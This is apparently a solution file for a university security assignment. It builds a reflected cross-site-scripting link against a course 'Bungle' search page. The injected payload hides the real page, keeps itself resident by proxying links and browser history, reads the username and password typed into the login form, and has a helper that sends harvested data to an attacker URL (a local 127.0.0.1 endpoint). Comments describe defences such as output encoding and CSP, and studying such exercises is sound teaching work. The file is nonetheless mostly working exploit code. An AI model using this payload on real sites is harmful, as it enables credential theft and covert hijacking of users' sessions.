- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
/**
 * Body of the injected script; makeLink() below stringifies this function
 * and embeds it in the reflected `q` parameter of the target's search page.
 * Once it runs inside the victim's document it hides the page, reloads the
 * site's pages through jQuery, strips every real link/form action and
 * routes them through proxy(), so the script stays resident while the user
 * keeps interacting with what looks like the normal site. The login handler
 * below reads the typed credentials before forwarding the real login.
 *
 * Defensive reading: the foothold is the target reflecting the search query
 * into the page unencoded (xssdefense=0 in makeLink). Context-aware output
 * encoding of `q`, or a CSP that disallows inline script, removes it; the
 * history.pushState calls are what keep the address bar looking legitimate.
 *
 * @param {string} attacker - base URL that log() sends harvested data to.
 */
function payload(attacker) {
  // Exfiltration helper: echoes the data to the console and GETs it to the
  // attacker URL as a query string.
  function log(data) {
    console.log($.param(data));
    $.get(attacker, data);
  }
  // Re-binds handlers after every proxied page load. Each real navigation
  // target has its href removed and is replaced by a click handler that
  // calls proxy(), so the document is never actually left.
  function loadcallback() {
    console.log("callback called");
    $("html").show();
    $('#bungle-lnk').removeAttr("href");
    $('#bungle-lnk').click(function() {
      // Only push a new history entry if we are not already at "/".
      proxy('/', history.state['url'] != '/', false);
    });
    $('#search-again-btn').removeAttr("href");
    $('#search-again-btn').click(function() {
      proxy('/', true, false)
    });
    $('.history-item').each(function() {
      // Capture the original href before it is stripped from the element.
      var value = $(this).attr('href');
      $(this).removeAttr('href');
      $(this).click(function () {
        proxy(value, true, false);
      });
    });
    // hijack search form
    $('#search-btn').click(function(e) {
      e.preventDefault();
      var attr = $("#query").val();
      // log to attacker
      console.log("search clicked");
      // fill in page
      // The search is performed for real so the page content stays correct;
      // note `attr` is concatenated into the proxied URL unencoded.
      $.ajax({
        url: "./search",
        data: {
          q: attr
        },
        type: "GET",
        success: function (data) {
          $("html").html(data);
          proxy("search?q=" + attr, true, false);
        }
      });
    });
    // Login interception: the submitted username/password are read from
    // the form and written to the console, then the real POST is sent so
    // the login succeeds and nothing looks wrong to the user.
    $('#log-in-btn').click(function(e) {
      e.preventDefault();
      var un = $('#username').val();
      var pw = $('#userpass').val();
      //TODO: log to attacker
      console.log("btn clicked: " + un + ", " + pw);
      $.ajax({
        url: "./login",
        data: {
          username: un,
          password: pw,
        },
        type: "POST",
        success: function (data) {
          $("html").html(data);
          proxy("/", false, false);
        }
      });
    });
  }
  /**
   * Replaces the document with the contents of `href` without leaving the
   * injected script's page, then re-binds the hijacked handlers.
   * @param {string} href - path to load (or the URL recorded in history).
   * @param {boolean} shouldPush - fetch `href` and push a history entry
   *   holding its URL and rendered HTML.
   * @param {boolean} useHistory - when not pushing, restore the HTML saved
   *   in history.state instead of fetching anything.
   */
  function proxy(href, shouldPush, useHistory) {
    console.log('proxy called');
    // add appropriate url to the history stack
    if (shouldPush) {
      $("html").load(href, function() {
        loadcallback();
        history.pushState({url: href, html: $("html").html()}, "", href);
      });
    }
    else {
      if (useHistory) {
        $("html").html(history.state["html"]);
      }
      loadcallback();
    }
  }
  // do this on first injection
  $("html").hide();
  $(document).ready(function() {
    // load script to the page
    // The three helpers are re-emitted as a <script> element appended to
    // <html>, with `attacker` baked in as a global; presumably so they stay
    // defined after $("html").html()/.load() replace the document — verify.
    var script = document.createElement('script');
    script.type = "text/javascript";
    script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString() + "\n" + loadcallback.toString();
    $("html").append(script);
    // popstate hander
    // Back/forward navigation is served from the HTML saved in state, so it
    // never triggers a real page load.
    window.onpopstate = function(e) {
      proxy(e.state['url'], false, true);
    };
    // initial history and page setup
    history.replaceState(null, "", "/"); // avoid flashing link
    $("html").load("/", function() {
      loadcallback();
      history.replaceState({url: "/", html: $("html").html()}, "", "/");
    });
  });
}
/**
 * Builds the link that delivers payload() through the target's search page.
 * Only the undefended case (xssdefense == 0) is handled here: the entire
 * source of payload() plus a call to it is placed in the `q` parameter,
 * relying on the target echoing `q` into its HTML without encoding. The
 * `else` branch is left empty in this listing.
 *
 * Note `attacker` is spliced into a JS string literal without escaping, and
 * the closing tag is split ("<\/script" + ">") so the string survives
 * being embedded in a script block.
 *
 * @param {number} xssdefense - defense level requested from the target.
 * @param {string} target - base URL of the vulnerable site.
 * @param {string} attacker - exfiltration URL passed through to payload().
 * @returns {string|undefined} the crafted URL, or undefined when
 *   xssdefense is not 0.
 */
function makeLink(xssdefense, target, attacker) {
  if (xssdefense == 0) {
    return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
  } else { // Implement code to defeat XSS defenses here.
  }
}
// Configuration for the link builder: defense level, vulnerable site, and
// the (local) endpoint that harvested data would be sent to.
var xssdefense = 0;
var target = "http://cos432-assn3.cs.princeton.edu/";
var attacker = "http://127.0.0.1:31337/stolen";
// On DOM ready, replace the <h3> placeholder with the crafted link. The URL
// is inserted via .html() into an attribute context without escaping; it is
// attacker-controlled here by design, but this pattern is itself an
// injection point if `url` ever came from elsewhere.
$(function() {
  var url = makeLink(xssdefense, target, attacker);
  $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
});
- </script>
- <h3>parse error</h3>